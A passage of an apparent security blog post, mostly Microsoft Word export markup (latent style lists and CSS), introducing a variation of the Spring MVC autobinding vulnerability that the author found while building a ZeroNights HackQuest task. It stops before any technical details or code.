<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">It's passed
much time since that publication and Spring MVC now is not like it was before.
It's much much cooler :)</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">When I was preparing
tasks for the last ZeroNigths HackQuest, I wanted to provide one with an autobinding
vuln to make people more familiar with this type of vulns. During the creation
of the task, I've spotted an unknown/hidden variation of the autobinding vuln and
I'd like to tell you about it.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">As I wrote
before, Spring MVC has changed. It's much smarter and has more features now.
One of the new things is using annotations for doing "magic" things. </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Because of
them and some misunderstanding in minds, we can find an autobinding vuln in unexpected
places.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Let's look
at some of them and their official description (taken from here </span><a href="http://docs.spring.io/spring/docs/3.1.x/spring-framework-reference/html/mvc.html" target="_blank"><span lang="EN-US" style="mso-ansi-language: EN-US;">http://docs.spring.io/spring/docs/3.1.x/spring-framework-reference/html/mvc.html)</span></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><br /></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></div>
<br />
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
